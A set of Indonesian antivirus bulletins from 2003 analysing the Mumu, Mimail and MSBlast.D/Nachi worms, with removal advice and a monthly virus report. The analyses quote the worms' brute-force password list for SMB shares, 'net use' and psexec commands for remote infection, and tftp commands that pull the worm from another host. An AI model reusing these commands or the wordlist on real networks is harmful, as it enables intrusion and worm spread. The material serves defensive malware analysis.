Mumu   3 Juli 2003

Menyerang Win NT, 2000 dan XP

Virus ini akan menaruh beberapa file dan komponen yang berbahaya. Setelah disekusi, MUMU.EXE akan membuat 2 buah mutex untuk memeriksa memorii :

-          qjinfo1mutex

-          qjinfo2mutex

Kemudian, menempatkan beberapa komponen di bawah ini :

• %Windows%\bboy.exe (21KB)
• %System%\last.exe (21KB)
• %System%\bboy.dll (37KB)
• %System%\kavfind.exe (31KB)
• %System%\psexec.exe (37KB)
• %System%\IPCPass.txt (1KB)
• %System%\mumu.exe (295KB)

MUMU.EXE adalah kopi dirinya sendiri, di mana BBOY.EXE dan LAST.EXE adalah komponen yang indentik. BBOY.DLL digunakan untuk keylogging dan proses mematikan aktifitas di dalam komputer.

IPCPass.txt berisi sebuah list dari passwords yang digunakan untuk menembus Server Message Block SMB shares. Dikenal sebagai komponen dari virus BAT_SPYBOT.A.

PSEXEC.EXE adalah sebuah program yang asli dari sysinternals.com, dikompres dengan menggunakan UPX utility dimana KAVFIND.EXE adalah sebuah Trojan lainnya yag dikenal sebagai TROJ_HACLINE.A.  

MUMU.EXE dan LAST.EXE aktif secara simultan.

Worm ini juga membuat sebuah registry di bawah ini untuk menyimpan network ID dari komputer yang terinfeksi:

HKEY_LOCAL_MACHINE\Software\mumu

Sebagai contoh, jika komputer yang terinfeksi mempunyai IP address 10.10.1.100, registry tersebut akan berisi sebuah value, 10.10.1.

BBOY.EXE dan BBOY.DLL

Setelah worm ini diesekusi, ia akan menempatkan sebuah komponen atau file BBOY.EXE, file tersebut akan diregistri seperti contoh di bawah ini, sehingga secara otomatis akan dijalankan setiap kali komputer startup :

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run,
Kernel ="%Windows%\bboy.exe"

Kemudian, worm akan menempatkan sebuah komponen BBOY.DLL, yang mana akan digunakan untuk menginstall sebuah keyboard hook dan mematikan beberapa proses seperti di bawah ini :

• kvapfw.exe
• kvfw.exe
• DFVSNET.exe
• Password Guard.exe
• Eghost.exe
• IPArmor.exe
• pfw.exe

Komponen ini akan membuat log semua hentakan keyboard pada komputer yang terinfeksi dan menempatkannya pada file QJINFO.INI. Kemudian ia akan mengirimkan semua log data ke sebuah email address yang mana sebagian besar  kemungkinan milik seseorang yang mempunyai niat jahat. Format dari email tersebut seperti contoh di bawah ini :

From: babyj@...
To: terminal2000@...
BCC: cq@...

Ia menggunakan sebuah Webmail site, http://www. 58589.com.com untuk mengirimkan log yang telah dibuat.

KAVFIND.EXE dan IPCPass.txt

Kedua file ini menggunakan sebuah list password yang mudah ditebak untuk menyerang SMB shares dan melihat default Admin share, Admin$.

File yang diletakkan yaitu file KAVFIND.EXE, dijadikan sebagai sebuah Trojan utiliti, yang akan memindai seluruh range dari class C network dan memeriksa kelemahan dan IP address. Trojan ini dikenal sebagai TROJ_HACLINE.A.

Untuk memperoleh akses yang digunakan untuk meremote sebuah komputer,KAVFIND.EXE berusaha menembus targetnya dengan menggunakan brute-force password-guessing attack. Ini digunakan dengan memakai list password yang mudah ditebak, dimana telah tersedia di dalam file yang bernama IPCPass.txt untuk masuk ke dalam targetnya ::

• %null%
• %username%
• %username%12
• %username%123
• %username%1234
• 123
• 1234
• 12345
• 123456
• 1234567
• 12345678
• 654321
• 54321
• 1
• 111
• 11111
• 111111
• 11111111
• 000000
• 00000000
• 888888
• 88888888
• 5201314
• pass
• passwd
• password
• sql
• database
• admin
• root
• secret
• oracle
• sybase
• test
• server
• computer
• Internet
• super
• user
• manager
• security
• public
• private
• default
• 1234qwer
• 123qwe
• abcd
• abc123
• 123abc
• abc
• 123asd
• asdf
• asdfgh
• !@#$
• !@#$%
• !@#$%^
• !@#$%^&
• !@#$%^&*
• !@#$%^&*(
• !@#$%^&*()
• KKKKKKK

Ketika memidai sebuah jaringan,  ia menyimpan setiap kelemahan dari komputer untuk diserang pada saat nanti dan salinan ini akan disimpan pada file IPCFind.txt. Format dari file log tersebut adalah sebagai berikut :

IP Address Username/Password

Contoh :

10.10.1.3 Administrator/12345
10.10.5.100 Administrator/123asd

It connects to each vulnerable system using the following command:

Net use \\%target_pc% "%password%" /u:"%user%"

Di mana :
%target_pc% - IP address dari remote PC
%password% - password dari ipcfind.txt
%user% - username dari ipcfind.txt

Kemudian, ia mengcopykan sebuah file worm mumu.exe pada Admin$\system32.

Catatan: Admin$ maksudhnya %root%\WINNT dalam keadaan default.

Ia menggunakan program yang legal psexec.exe dari sysinternals.com untuk meremote pengcopian dari file mumu.exe dengan menggunakan perintah seperti di bawah ini :

start /i /min /wait /B psexec \\%s -u "%s" -p "%s" -d mumu.exe

Ia kemudian menghapus log dari file IPCFind.txt.

Disamping IP scanning untuk mencari komputer target. Ia menjalankan sebuah perintah dalam 1 menit untuk mendapatkan kemungkinan sebuah hubungan dan menyimpannya dalam sebuah file yang bernama :

CMD /c netstat -n|find \":\" >A.TMP

Kemudian mengirimkan perintah PING ke semua komputer dan mempertimbangkan string “reply” sebagai sebuah success reply. Output dari perintah PING output hasilnya sementara disimpan dalam sebuah file yang bernama B.TMP file.

Ketika hubungan tersebut sukses , ia akan mengcopykan sebuah worm ke komputer lainnya sebagai Admin$\Winnt\MUMU.EXE dan mengaktifkan worm tersebut. Kemudian menghapus file A.TMP dan  B.TMP setelah semuanya berjalan.

Koneksi SMTP

Worm ini mengandung sebuah perintah SMTP (Simple Mail Transfer Protocol) untuk menghubungkan SMTP server, SMTP.SINA.COM.CN.

Ia akan membuat sebuah email seperti contoh di bawah ini :

To: reint0.student@...
From: sendmail2.student@...
Subject: 27<Computer Name>
Date: <Current Date>

Worm ini juga membuat sebuah pop-up dalam bentuk mini child window dengan class name, “Systary” dan kemudian memodifikasi registry seperti di bawah ini:

HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\Run
Folder Service = qjinfo.exe

Worm ini hanya menyerang pada Windows NT, Windows 2000, Windows XP

Sumber : TrendMicro

Marcel Gemini Man

Evaluasi Virus Juli 2003    1 Agustus 2003

Usaha kudeta terhadap Klez dan RPC Dcom

Klez sudah turun tahta ? Berita ini dapat dikatakan suatu kelegaan bahwa virus ini sudah tidak lagi merupakan suatu ancaman untuk para pemakaian komputer di seluruh dunia.. Tetapi, kelegaan ini diganti dengan suatu ancaman yang lebih besar dari datangnya virus-virus baru yang membawa teknik-teknik baru dalam penyebarannya.

Kalau kita melihat grafik dari aktivitas virus-virus worm yang dikeluarkan oleh MessageLabs, terlihat bahwa virus Klez hampir dalam bulan Juli 2003 tidak duduk dalam urutan pertama, posisi ini digeser oleh virus Yaha.E dan Bugbear.B.

Untuk bulan ini tidak banyak virus-virus yang beresiko tinggi, dan penyebarannya tidak terlalu mengkuatirkan seperti :

1. Redlof.A 9.653 insiden, terlihat juga bahwa virus VBS/Redlof.A@m dalam jumlah yang cukup signifikan menempati urutan pertama didalam penyebarannya di Indonesia. Mengapa hal ini dapat terjadi ? Virus ini cukup unik, setiap kali dibersihkan selalu akan muncul kembali. Cukup merepotkan kalau kita tidak tahu cara membersihkannya secara benar dan tepat. Trik yang pertama kali yang harus anda lakukan adalah mematikan fasilitas dari Windows Scripting Host. Virus ini akan menggunakan fasilitas applikasi tersebut. Setelah anda matikan (disable), anda dapat membersihkan virus tersebut. Virus ini akan membuat 2 buah file pada setiap direktori, file Folder.htt (berukuran 23 byte) dan desktop.ini. menginfeksi HTM, HTML, ASP, PHP, JSP, HTT dan VBS dengan memasukkan VBScript yang mengandung kode virus yang terenkripsi ke dalamnya. Redlof memanfaatkan celah keamanan Microsoft VM ActiveX yang memungkinkan virus ini secara otomatis dijalankan "hanya" dengan membuka halaman HTML yang terinfeksi.

2. JS/Exploit 6.638 insiden, Semua komputer hampir dipastikan menggunakan JavaScript. JS pada pertama kali dibuat adalah bukan sebuah virus !!!! Tetapi kemudian sebuah metode untuk mengexploit sebuah celah keamanan pada Microsoft Virtual Machine dimana sangat potensial sebuah script yang berbahaya mengakses kebanyak ActiveX control installed pada para pengguna komputer. Dan sebagian besar exploit terkenal dengan sebutan 'Incorrect MIME Header exploit' atau 'Iframe'.

JavaScript Exploit mempunyai banyak sekali nama-nama lain seperti :

• HTML.VMExploit
• JS.Offensive
• JS.ActiveXComponent
• JS.Exception.Exploit

Sebuah Incorrect MIME Header exploit mengizinkan untuk sebuah attachment dari email dijalankan secara otomatis pada beberapa versi Microsoft e-mail dan web browsing yang belum dipatch. Exploit ini secara luas digunakan oleh beberapa e-mail worm yang terkenal - Nimda, Klez, Yaha, Bugbear, Bridex dan masih banyak lagi. Ketika seorang menerima sebuah email yang terinfeksi hanya dengan melakukan Auto Previews, langsung virus tersebut dapat aktif karena menggunakan Iframe exploit dan kemudian komputer akan terinfeksi.

Cara Exploit ini digunakan juga oleh virus worm Opaserv yang telah menyebar secara luas ke seluruh dunia, dan ini dikenal sebagai 'Share level password exploit'. Opaserv worm ini mencoba membongkar sebuah share password dengan hanya memilih sebuah character dari sebuah password dengan menggunakan metode bruteforce. Dalam kasus ini jika sebuah karakter awal telah diketahui, maka secara mudah password tersebut akan diketahui.

Beberapa produk antivirus mungkin akan melaporkan bahwa sebuah code HTML sebagai exploiting sebuah celah keamanan, ini juga berlaku jika sebuah code tidak mengandung virus. Sebagai contoh, sebuah celah keamanan dipakai oleh pornographic atau permainan judi melalui internet. Jadi jangan heran kalau kita sedang membuka sebuah web site, tiba-tiba ada alret dari antivirus yang terpasang, bahwa ada file yang terdeteksi sebagai sebuah virus. Biasanya file tersebut mengandung JavaScript, kemudian karena antivirus tidak mau mengambil resiko jadilah file tersebut dianggap bervirus. Dan biasanya lagi, file-file tersebut banyak terdapat pada direktori C:\Windows\Temporary Internet Files. Pada direktori ini terdapat banyak sekali file-file dari setiap web site yang telah kita kunjungi. Oleh sebab itu, kadang kala antivirus tidak dapat menghapus file-file JS karena sedang dipakai oleh sebuah program browser. Untuk para pemakai Internet Explorer ver 5.X ke atas, anda dapat menghapus file-file temporary internet tersebut setiap kali anda menutup browser IE anda tersebut. Caranya adalah aktifkan opsi ‘Empty Temporary Internet Files folder when browser is closed’. Lakukan cara ini : Jalankan IE anda, kemudian klik Tools, Internet Options, Advanced. Aktifkan pilihan pada opsi ‘Empty Temporary Internet Files folder when browser is closed’.

Karena ini menyangkut JavaSript, anda diharuskan mengupdate Microsoft Virtual Machine ke versi yang terbaru. (baca keterangannya di http://www.vaksin.com/update_vm.htm)

3. Fortnight.E 3.104 insiden, dengan kemajuan teknik pembuatan virus yang lebih maju, banyak sekali virus-virus baru yang bermunculan misalnya virus Fortnight.E, virus ini dalam bulan Juli 2003 meskipun lambat penyebarannya tetapi dengan pasti telah menginfeksi banyak sekali komputer. Fortnight.E menggunakan celah kelemahan yang ada di dalam system windows yang menjalankan program JavaScrip. Karena program Java harus dijalankan di dalam Microsoft Virtual Machine For Java, maka digunakanlah kelemahan yang ada di dalam MVM tersebut. Virus ini akan menyerang celah keamanan jika versi dari MVM yang kita punya adalah versi di bawah 5.00.3810. Anda diharuskan untuk mengupdate MVM tersebut ke versi yang lebih baru. Virus ini akan menyebar melalui email yang anda kirim. Setiap email biasanya ada sebuah signature, virus ini akan merubah atau menambahkan sebuah signature yang baru di dalam bentuk sebuah file HTML. Dan file tersebut adalah virus itu sendiri untuk menyebarkan dirinya. Agak cerdik juga para pembuat virus Fortnight ini. Tanpa kita sadari ia sudah mengirimkan virus dan kalau virus itu telah berkembang biak akan terdapat tanda-tanda atau jejak yang ditinggalkan.

Adapun jejak atau tanda-tanda bahwa di dalam komputer kita telah terserang virus ini adalah :

1. Pada Outlook Express, ada bisa lihat pada Signature (Tool, Options, Signature), kalau ada sebuah link pada bagian bawahnya (C:\Windows\s.html) sudah dipastikan komputer anda sudah terjangkit virus ini.

2. Hal yang lainnya ada bisa lihat pada tools bar yang ada di Internet Explorer, apakah di sana ada penambahan 5 buah tool bar yang baru yang terdiri dari SEARCH, ANTIVIRUS, ENTERTAINMENT, SECURITY, SEARCH

 

3. Kalau tiba-tiba komputer kita yang terhubung dengan internet memasuki sebuah web site situs porno, tetapi kita tidak pernah mengetik alamat web tersebut, ini juga merupakan tanda-tanda dari kehadiran virus Fortnight sudah ada di dalam komputer anda.

Virus Baru di bulan Juli 2003 yang tidak masuk Top 10 virus Indonesia.

Gruel.B menyebar melalui e-mail dan program P2P (peer-to-peer) seperti KaZaA. Jika telah menyebar di komputer anda, harap berhati-hati karena ia akan menghapus banyak sekali file windows anda. Sifat-sifat lainnya adalah menyembunyikan drive C:\, membuka windows pada Control Panel; mematikan Taskbar; menampakan beberapa messages desktop dan sebagainya.

Lohack, mempunyai sifat penyebaran seperti dengan virus-virus worm lainnya yaitu melalui e-mail, KaZaA dan melalui jaringan. Worm ini mencoba untuk memperdaya pemakai komputer dengan membuat sebuah berita yang dipercaya oleh user telah dikirimkan oleh organisasi yang dapat dipercaya. Virus ini akan aktif ketika berita yang sebenarnya adalah virus dibaca oleh para user. Ini dapat terjadi karena virus tersebut mengandung Exploit/iFrame yang menyerang celah-celah keamanan kelemahan yang biasa ditemukan pada Microsoft Internet Explorer version 5.01 dan 5.5. Bagaimanapun juga, jika anda telah melakukan patch, virus ini tidak dapat berjalan secara automatis.

RPC DCOM Exploit

Untuk bulan ini ditutup dengan adanya peringatan celah keamanan yang sangat berbahaya telah ditemukan ditemukan pada tanggal 16 Juli 2003, RPC DCOM vulnerability. Celah keamanan ini sangat berbahaya dan mengancam pengguna : Microsoft Windows NT 4.0 & Terminal Services Edition, Microsoft Windows 2000, Microsoft Windows XP, dan Microsoft Windows Server 2003

 Celah keamanan ini memungkinkan penyusup untuk melakukan :

·         Instalasi Program

·         Melihat, merubah dan menghapus data

·         Membuat user baru dengan hak akses full pada komputer yang belum di patch.

Resiko yang paling besar adalah serangan dari penyusup internal

Salah satu kondisi yang harus dipenuhi untuk memanfaatkan exploit ini adalah port 135, 139 dan 445 terbuka sehingga secara teori, pada internet server yang umumnya berada dibelakang firewall, port ini tertutup oleh firewall sehingga tidak dapat di exploit. Kemungkinan untuk exploitasi celah keamanan ini lebih besar dari penyusup kalangan internal yang berada di dalam satu jaringan dengan komputer yang di eksploit.

Bagaimana cara mengupdate

Setelah and membaca uraian di atas, tantunya anda tidak sabar ingin mengetahui bagaimana cara update patch dan kemana harus mengupdate. Informasi lengkap mengenai hal ini dapat anda akses di http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp dan untuk melakukan update,

Apa yang akan terjadi jika virus memanfaatkan exploit ini ?

Kami agak mencemaskan jika pembuat virus memanfaatkan celah keamanan ini karena file untuk mengeksploit celah keamanan ukurannya hanya 16 KB dan dengan mudah dimasukkan ke dalam salah satu bagian dari aksi virus. Virus yang memiliki kemampuan eksploitasi Dcom ini, cukup menginfeksi salah satu komputer dalam jaringan yang tidak terproteksi oleh antivirus yang terupdate.

Dengan kemampuan remote untuk memanipulasi atau sekaligus menghancurkan file komputer lain dalam jaringan tanpa dapat dicegah oleh empunya komputer atau antivirus sekalipun karena tidak lagi memanfaatkan openshare, hal ini akan sangat berbahaya bagi seluruh komputer dalam jaringan. Dan hebatnya, komputer yang datanya dihancurkan tersebut boleh jadi sama sekali steril alias tidak terinfeksi virus.

Ini adalah penjabaran yang kami analisa untuk perkembangan virus di Indonesia dalam bulan Juli 2003.

Bagaimana dengan analisa penyebaran virus di Indonesia pada bulan Agustus  nanti ?

Kami prediksikan bahwa virus-virus seperti Bugbear, Klez, Lovelorn, Redlof, Fortnight masih akan merajarela dalam penyebarannya. Oleh sebab itu anda jangan selalu lupa untuk mengupdate definisi antivirus anda, dan mengupdate porgram Outlook Express anda dengan patch yang telah tersedia pada Situs Microsoft. Saran kami, kalau komputer anda cukup performanya, update saja Internet Explorer versi 5.X menjadi versi yang terbarunya ver.6.0 SP1. Ini akan meningkatkan security anda, karena lebih banyak celah-celah yang dapat ditembus oleh virus kalau anda memakai versi yang terdahulu. Tapi disamping itu anda harus lebih berhati-hati dengan adanya celah keamanan RPC DCOM yang baru ditemukan pada tanggal 16 Juli 2003. Karena dengan mudahnya masuk ke dalam komputer korban tanpa diketahui. Mungkin tidak lama lagi ada sebuah virus yang memakai celah keamanan ini. Kita tunggu saja beritanya. Oleh sebab itu jangan lalai memperbaharui windows anda dengan patch yang telah disediakan oleh Microsoft, back up data penting anda dan gunakan antivirus pada setiap komputer dalam jaringan tanpa kecuali.

Team Vaksincom

W32.Mimail.A@mm   4 Agustus 2003

Menggunakan cara unik untuk mendapatkan email korbannya

Mimail adalah sebuah worm yang cukup unik dalam mencari alamat email di dalam sebuah komputer yang terinfeksi. Mengapa dikatakan cukup unik, kalau anda membaca artikel di bawah ini baru anda merasakan bahwa banyak sekali cara-cara yang dilakukan oleh para pembuat virus untuk mendapatkan sebuah alamat email untuk sarana penyebarannya. Anda perlu berhati-hati karena pada hari ini, Mimail bercokol di peringkat ke tiga sebagai worm yang paling banyak dihentikan oleh MessageLabs, tetapi pada sore hari waktu Indonesia Mimail langsung menempati peringkat pertama sebagai virus yang paling banyak dihentikan oleh MessageLabs. Di Indonesia sendiri, Vaksincom sudah mendapatkan konfirmasi bahwa Mimail sudah memakan korban.

Virus ini menyebar melalui SMTP miliknya sendiri, dan selalu membawa sebuah file attach di dalam sebuah file MESSAGE.ZIP yang sebenarnya adalah sebuah file MESSAGE.HTML yang dikompres menggunakan UPX. Tetapi file HTML tersebut mengandung sebuah file Win32.EXE yang dikenal dengan nama FOO.EXE. Ketika file .ZIP tersebut dibuka,  virus ini akan menyerang celah keamanan yang ada di dalam program Internet Explorer, yang menginzinkan sebuah script dapat dijalankan pada komputer lokal. Adapun produk Microsoft yang diserang adalah :

• Microsoft Outlook Express 5.5
• Microsoft Outlook Express 6.0
• Microsoft Internet Explorer 5.01
• Microsoft Internet Explorer 5.5
• Microsoft Internet Explorer 6.0

Saat file foo.exe ini disimpan dan kemudian dijalankan, user akan melihat text besar pada browser. Text tersebut berbunyi   "Please wait loading message ....." warna merah dengan latar belakang hitam

Virus ini akan datang ke komputer anda menyamar sebagai sebuah Admin dan hebatnya ia mengetahui account user anda. Jadi kira-kira email yang anda terima ciri-cirinya sebagai berikut :

From: Admin (ADMIN@your_doamin)
Subject: your account %user%
Importance: High

Hello there,

I would like to inform you about important information regarding your email address. This email address will be expiring. Please read attachment for details.

--- Best regards, Administrator

Attachment: message.zip

Yang dilakukan pertama kali jika virus ini menyebar adalah mengcopykan dirinya sendiri menjadi sebuah file yang bernama VIDEODRV.EXE, file ini diletakkan pada direktori C:\Windows. Setelah itu ia membuat sebuah key registry yang akan dijalankan setiap kali windows startup :

HKEY_Local_Machine\Software\Microsoft\Windows\CurrentVersion\Run
" VideoDriver "=" %Windows% \videodrv.exe "

Virus ini akan membuat 2 buah file temporari pada direktori C:\windows yaitu :

• Zip.tmp: ini adalah temporary copy dari message.zip (30,079 bytes).
• Exe.tmp: ini adalah temporary copy dari message.html (29,957 bytes).

Pertama-tama, virus ini akan memeriksa apakah komputer kita terhubung dengan ke internet dengan mencoba menghubungi sebuah web site http://www.google.com. Jika berhasil, virus ini mencoba untuk mencari alamat email dari komputer kita. Alamat email yang didapat kali ini bukan hanya dari file-file .HTML, .DBF dan lain sebagainya, tetapi kali ini semua file yang berekstensi seperti dibawah ini :

• bmp
• avi
• cab
• com
• dll
• exe
• gif
• jpg
• mp3
• mpg
• ocx
• pdf
• psd
• rar
• tif
• vxd
• wav
• zip

Setelah semua alamat email didapat, virus ini akan mengkoleksikan di dalam sebuah file yang bernama eml.tmp dan diletakkan di dalam direktory C:\WINDOWS. Bisa jadi virus worm ini mempunyai sifat spam, karena ia akan mengirim ke ribuan alamat email yang ditemukan.

Virus ini menggunakan SMTP Servers untuk mengirimkan dirinya, seperti contoh di bawah ini :

acm.org
alias2.acm.org
mirc.com
mx2.daemonmail.net
iglou.com
mail.iglou.com
ft.com
winamp.com
mail.winamp.com
smtp.ceruleanstudios.com
ceruleanstudios.com

Ia juga mencoba menggunkana usernames di bawah ini untuk menghubungkan dengan SMTP servers tersebut:

admin@...
jseward@...
admin@...
servers@...
admin@...
idm@...
admin@...
aus@...
admin@...
tjerk@...
admin@...
info@...
tjerk@...

Bagaimana mencegah virus ini agar tidak menyerang komputer anda ?

1. Yang pasti anda tidak mengupdate Outlook Express dan Internet Explorer anda. Microsoft telah menyediakan patch-patch untuk ke dua program tersebut di atas.

2. Kami anjurkan anda mengupdate program tersebut di atas menjadi Internet Explorer 6 SP1.

3. Install Microsoft Virtual Machine yang terbaru. (Caranya anda dapat membaca dari link ini, http://www.vaksin.com/update_vm.htm)

4. Edit file Regitry anda dengan cara hapus value “VideoDriver di bawah ini :

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" "HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run"

5. Hapus file di direktori WINDOWS (C:Windows atau C:\Winnt)

• Videodrv.exe
• Eml.tmp
• Exe.tmp
• Zip.tmp

Sekali lagi kami ingatkan jangan anda lalai mengupdate IE dan OE anda dengan patch yang telah tersedia di web site Microsoft. Dan anda bisa mendownload tools yang tersedia antara lain di Bitdefender .

salam,

Team Vaksincom

Corporate Virus Protection 2003 in Medan

Lokasi :

Lembaga Pendidikan Perkebunan Kampus Medan

Jl. Willem Iskandar 20222 Medan

Telp. (061) 6613364 (Hunting),  6635271 (Biro Diklat), Fax. (061) 6613204

Waktu :

28 dan 29 Agustus 2003

Pembicara :

• Alfons Tanujaya, Antivirus Specialist Vaksin.com

• Team technical Support Vaksin.com Medan, Nusa Mega

Materi :

• Manajemen Antivirus di Jaringan Korporat

• Instal Antivirus dengan satu klik

• Tips dan Trik menghadapi virus membandel dalam jaringan

• Kebijakan Sekuriti yang baik guna mencegah penyebaran virus

Biaya workshop :

• Perusahaan / umum  Rp. 550.000,-

Biaya workshop sudah termasuk :

• Software Antivirus original Norman Virus Control for Corporate Network (Win 9X/ME//NT/2000/XP, NT Server/2000 Server, MS Exchange / Lotus Notes) + update engine dan definisi 3 bulan ATAU Norman Virus Control for workstation single License + update engine dan definisi 12 bulan. Harga software adalah Rp. 380.000,-

• Workshop Kit (materi workshop).

• Dokumentasi digital layak cetak (3.2 MegaPixel) GRATIS.

• Sertifikat.

• Coffee Break dan Lunch.

Pendaftaran :

Lembaga Pendidikan Perkebunan Kampus Medan

Jl. Willem Iskandar 20222 Medan

Telp : (061) 661 3364 (Hunting), 663 5271 (Biro Diklat)

Fax  :(061) 661 3204

MSBlast.D      19 Agustus 2003

Keluar dari mulut macan, masuk ke mulut buaya

Akhirnya varian-varian baru dari virus Blast ini bermunculan. Serangan yang dimunculkan semakin beraneka ragam. Pada tanggal 18 Agustus 2003, muncul sebuah varis baru mungkin bisa dikatakan varian dari versi yang aslinya atau dapat juga merupakan modifikasi tingkat lanjut dalam metode penyerangannya. Virus baru ini dikenal sebagai W32/Nachi.A, atau ada juga yang menamakannya WORM_MSBLAST.D. Virus ini sangat cepat sekali mewabah, terutama pada negara-negara di Asia, contohnya yang terbanyak adalah Jepang.

Suatu hal yang baru dalam penyerangannya adalah menyerang sekaligus 2 buah celah keamanan yang ada di dalam System Microsoft yang anda pakai. Jadi pertama-tama virus ini akan menyerang celah keamanan pada DCOM RPC dengan menggunakan TCP port 135, dan pada versi ini yang diserang hanya khusus untuk system operasi Windows XP. Kemudian ia akan menyerang celah keamanan WebDAv dengan menggunakan TCP port 80, dan mempunyai target khusus di setiap system yang menjalankan Micosoft IIS 5.0.

Worm ini mempunyai 2 buah komponen utama dalam penyerangannya, file-file tersebut adalah DLLHOST.EXE dan SVCHOST.EXE. File DLLHOST.EXE berukuran 10,240 Kb sedang file aslinya mempunyai ukuran 6 Kb, dan file SVCHOST.EXE berukuran 19,728 Kb, ukuran aslinya adalah 8 Kb. File DLLHOST.EXE adalah komponen utama worm dan file SVCHOST.EXE adalah standar TFTP ( Triviral File Transfer Protocol ) server yang digunakan oleh worm untuk mengirimkan dirinya ke komputer yang menjadi target.

Ketika W32.Welchia.Worm dijalankan, ia akan melakukan beberapa aksi seperti di bawah ini :

1. Mengcopykan dirinya sendiri pada direktori :
   %System%\Wins\Dllhost.exe
   Catatan : Pada system windows 2000 terletak pada C:\Winnt\System32, atau C:\Windows\System32 pada system operasi Windows XP.

2. Membuat sebuah copy file %System%\Dllcache\Tftpd.exe, menjadi %System%\Wins\svchost.exe.
   Catatan : Svchost.exe adalah sebuah program yang legal, yang mana bukan merupakan sebuah malicious, oleh sebab itu setiap antivirus tidak mendeteksi sebagai sebuah virus.

3. Membuat 2 buah services: menggunakan Windows Service Control Manager :
   Service Name: RpcTftpd
   Service Display Name: Network Connections Sharing
   Service Binary: %System%\wins\svchost.exe
   
   Service ini akan di set untuk dijalanan secara manual.
   
   Service Name: RpcPatch
   Service Display Name: WINS Client
   Service Binary: %System%\wins\dllhost.exe
   
   Service ini diset untuk dijalankan secara otomatis.

4. Virus ini juga membuat 2 buah value pada file registry :
   HKLM\System\CurrentControlSet\Services\RpcTftpd\ImagePath = "%System%\wins\svchost.exe"
   HKLM\System\CurrentControlSet\Services\RpcPatch\ImagePath = "%System%\wins\DLLHOST.EXE

5. Akhir dari semua proses ini, virus tersebut akan menghapus file msblast yang berada di dalam direktori %System%\msblast.exe, virus ini ditelakkan oleh W32.Blaster.Worm.

6. Kemudian worm ini akan menyeleksi setiap IP address korban dengan 2 cara yang berbeda. Ia akan menggunakan metode A.B.0.0 dari IP komputer yang terinfeksi IP dari A.B.C.D dan menghitung maju, atau ia akan membuat sebuah IP address secara acak pada beberapa hard-coded addresses. Setelah menyeleksi start address, ia akan menghitung maju sampai range dari ukuran Class C networks, untuk contoh, jika ia memulai dari A.B.0.0, ia akan menghitung maju sampai hitungan yang terakhir pada A.B.255.255.

7. Worm ini akan memeriksa alamat IP anda apakah terhubung dengan sebuah jariangan atau tidak dengan cara melakukan ICMP echo, atau PING.

8. Jika terdekteksi bahwa komputer atau alamat IP tersebut terhubung dalam sebuah jaringan, ia akan mengirimkan data melalui TCP port 135, dimana port ini dipakai untuk mengeksploitasi celah keamanan DCOM RPC, atau ia akan mengirimkannya ke TCP port 80 untuk mengeksplotasi celah keamanan yang ada pada WebDav.

9. Membuat sebuah remote shell pada host yang ada celah keamanannya yang akan terkoneksi kembali untuk diserang dengan memakai alamat TCP port secara acak antara 666 dan 765 untuk menerima perintah.

10. Menjalankan TFTP server pada komputer yang terserang, memerintahkan si korban untuk mengkoneksikan dirinya dan mendownload sebuah file yang bernama Dllhost.exe dan Svchost.exe dari sebuah komputer yang telah diserang. Jika file tersebut, %System%\dllcache\tftpd.exe sudah ada, virus tersebut tidak akan mendownload file svchost.exe. Di bawah ini adalah syntax dari cara virus ini mendownload :
    tftp -i %s get svchost.exe wins\SVCHOST.EXE
    tftp -i %s get dllhost.exe wins\DLLHOST.EXE

11. Memeriksa system operasi sebuah komputer, Service Pack, dan System Locale serta mencoba mengkoneksikan komputer korban ke web site Microsoft's Windows Update dan mendownload DCOM RPC vulnerability patch. Virus ini akan memeriksa melalui registry key :
    HKEY_LOCAL_MACHINE\SOFTTWARE\Microsoft\Updates\Windows 2000\SP5\KB823980
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP1\KB823980
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP2\KB823980

12. System Versi Windows yang didownload antara lain yang berbahasa Inggris, Cina dan Korea.
    http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe
    
    http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe
    
    http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9125-6858b759e977/ Windows2000-KB823980-x86-CHS.exe
    
    http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe
    
    http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe 
    
    http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe 
    
    http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8d48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe 
    
    http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP- KB823980-x86-ENU.exe
     

13. Setelah update tersebut telah berhasil download dan kemudian dijalankan, worm ini akan merestart komputer tersebut setelah path tersebut terinstall.

14. Worm ini akan memeriksa system penanggalan pada komputer anda, jika menunjukkan tahun 2004, maka worm tersebut akan menghapus dirinya sendiri.
    
    Sebenarnya virus ini berisi sebuah string, tetapi tidak ditampakkan:
    =========== I love my wife & baby :)~~~ Welcome Chian~~~
    Notice: 2004 will remove myself:)~~ sorry zhongli~~~====
    ======= wins

Anda bisa menghapus virus ini secara manual dengan cara :

1.  Update patch DCOM RPC anda. ( http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-026.asp )

2. Delete file DLLHOST.EXE dan SVCHOST.EXE yang terletak pada WINS directory C:\WINDOWS\SYSTEM32\Wins\.
   
   Catatan : Hanya file-file tersebut di atas yang dihapus.

3. Edit dan delete file registry pada value :
   o "RpcPatch" key dari :
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
   o "RpcTftpd" key dari :
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    

Gemini Man

Worm Blaster dan Sobig.F menjangkiti pengguna internet Indonesia     10 September 2003

